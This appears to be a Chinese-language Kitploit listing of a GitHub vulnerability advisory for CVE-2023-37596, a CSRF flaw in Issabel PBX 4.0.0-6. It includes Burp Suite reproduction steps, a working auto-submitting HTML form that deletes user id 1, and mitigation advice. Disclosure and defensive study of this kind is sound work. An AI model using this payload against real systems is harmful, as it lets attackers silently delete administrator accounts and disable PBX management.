Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-37596 — CVE-2023-37596 是在 Issabel PBX 4.0.0-6 版本中发现的一个跨站请求伪造(CSRF)漏洞,Issabel PBX 是一个广泛使用的开源统一通信平台。 | Kitploit
工具/GitHubGitHub/sahiloj/cve-2023-37596
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 是在 Issabel PBX 4.0.0-6 版本中发现的一个跨站请求伪造(CSRF)漏洞,Issabel PBX 是一个广泛使用的开源统一通信平台。

查看仓库
1116个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-37596 —— issabel-pbx 4.0.0-6:跨站请求伪造(CSRF)—— 删除任意用户

严重性: 高危  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


目录

  • 概述
  • 漏洞详情
  • 影响
  • 受影响版本
  • 攻击场景
  • 概念验证(复现步骤)
  • 缓解 / 修复措施
  • 参考资料
  • 披露时间线
  • 作者

概述

在 Issabel PBX 4.0.0-6 版本中发现了一个**跨站请求伪造(CSRF)**漏洞。其用户管理端点未实现任何 CSRF 防护,这使得未认证的远程攻击者能够构造一个恶意网页——当已认证的 Issabel 管理员访问该页面时——会静默地从系统中删除任意用户账户。反复利用该漏洞可移除所有管理员用户,从而使整个应用程序不可访问。


漏洞详情

字段值
CVE 编号CVE-2023-37596
漏洞类型跨站请求伪造(CSRF)
CWECWE-352
产品Issabel PBX
受影响版本4.0.0-6
厂商主页https://www.issabel.org/
软件仓库https://github.com/IssabelFoundation/issabelPBX
测试环境Windows
CVE 发布日期10/07/2023
发现者Sahil Ojha

影响

由于 Issabel PBX 未验证发送至其用户管理接口的状态变更请求的来源,一次成功的 CSRF 攻击可让攻击者:

  • 删除任意用户账户 —— 包括主管理员账户 —— 且受害者毫不知情。
  • 造成拒绝服务(DoS) —— 通过移除所有用户,任何人都无法登录,使 PBX 管理面板完全不可访问。
  • 破坏电话服务 —— 电话系统的配置和管理将不可用,直到在服务器层面手动恢复账户为止。

受影响版本

产品受影响版本状态
issabel-pbx4.0.0-6存在漏洞

攻击场景

攻击者托管一个恶意 HTML 页面,其中包含针对 Issabel PBX 应用程序删除用户端点的伪造 HTTP 请求。当已在 Issabel 中完成认证的用户在同一浏览器中访问该恶意页面时,攻击会自动触发(或通过按钮点击触发)。由于浏览器会自动在每次请求中附带受害者的会话 Cookie,服务器会将伪造的删除请求视为合法请求。

攻击者一方无需任何特殊权限 —— 仅需一种社会工程学途径(钓鱼链接、恶意广告等)将已认证的管理员引诱至精心构造的页面即可。

此攻击的关键特征:

  • 攻击者一方无需认证。
  • 单击一次(若使用 `` / 自动提交表单,甚至零点击)即可触发该漏洞利用。
  • 通过修改载荷,可针对任意用户 ID(例如 id=1、id=2……)。
  • 该攻击对受害者而言不可见;页面可以显示无关内容,同时在后台静默提交伪造请求。

概念验证(复现步骤)

前提条件

  • Burp Suite(社区版或专业版)
  • 配置为通过 Burp Suite 代理流量的浏览器
  • 网络中可访问的 Issabel PBX 4.0.0-6 实例

步骤 1 —— 以管理员身份登录

访问 Issabel PBX 用户列表页面,并使用管理员凭据进行认证:

root@kitploit:~
https://<Issabel-IP>/index.php?menu=userlist

步骤 1 —— Issabel PBX 用户列表


步骤 2 —— 在 Burp Suite 中捕获删除用户请求

  1. 在 Burp Suite 代理激活状态下,点击目标用户旁边的 Delete 按钮。
  2. 在 Burp Suite 的 Proxy → HTTP history 中,找到捕获到的 DELETE/POST 请求。
  3. 右键单击该请求,选择 Engagement Tools → Generate CSRF PoC。

步骤 2 —— 在 Burp Suite 中捕获删除请求


步骤 3 —— 生成并保存 CSRF 漏洞利用

Burp Suite 将生成一个与下面类似的 HTML 页面。将其保存为 .html 文件(例如 csrf_exploit.html):

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

注意: 将 <Issabel-IP> 替换为目标服务器的 IP 地址或主机名,并调整 id 值以针对其他用户账户。


步骤 4 —— 将漏洞利用传递给已认证的管理员

将 csrf_exploit.html 文件(或指向其托管位置的链接)发送给当前已登录 Issabel PBX 的用户。当受害者打开该页面时,表单会自动提交,目标用户会在没有任何确认提示的情况下被删除。

步骤 4 —— CSRF 漏洞利用已执行,用户被删除

步骤 4 —— 确认用户已被移除


缓解 / 修复措施

厂商和/或系统管理员应采取以下防御措施来修复此漏洞:

  1. 实施 CSRF 令牌 —— 为每个会话(或每个请求)生成一个加密随机的令牌,并在服务端对每个状态变更请求进行验证。未携带有效令牌的请求必须被拒绝。

  2. SameSite Cookie 属性 —— 将会话 Cookie 的 SameSite 属性设置为 Strict 或 Lax,以防止在大多数浏览器中跨源请求携带会话 Cookie。

  3. 验证 Origin / Referer 请求头 —— 在服务端,拒绝任何 Origin 或 Referer 请求头与应用程序自身域名不匹配的状态变更请求。

  4. 对破坏性操作要求重新认证 —— 在处理删除用户账户等不可逆操作之前,提示用户重新输入密码。

  5. 应用最小权限原则 —— 确保只有具有明确管理员角色的用户才能访问用户删除功能,从而缩小成功攻击的爆炸半径。

在厂商发布补丁之前,建议管理员采取以下措施:

  • 通过防火墙规则,将 Issabel PBX 管理面板的访问权限限制在受信任的 IP 地址范围内。
  • 在登录管理面板期间,避免浏览不受信任的网站。

参考资料

  • NVD —— CVE-2023-37596
  • OWASP —— 跨站请求伪造(CSRF)
  • CWE-352:跨站请求伪造(CSRF)
  • Issabel PBX 官方网站
  • GitHub 上的 IssabelFoundation/issabelPBX
  • PortSwigger —— CSRF

披露时间线

日期事件
10/07/2023发现并报告漏洞
10/07/2023分配 CVE-2023-37596

作者

Sahil Ojha

  • 安全研究员
  • CVE:CVE-2023-37596

免责声明: 本仓库仅用于教育和负责任披露目的。未经系统所有者的明确书面许可,不得使用此处提供的信息攻击系统。作者对任何滥用此信息的行为不承担任何责任。

下载工具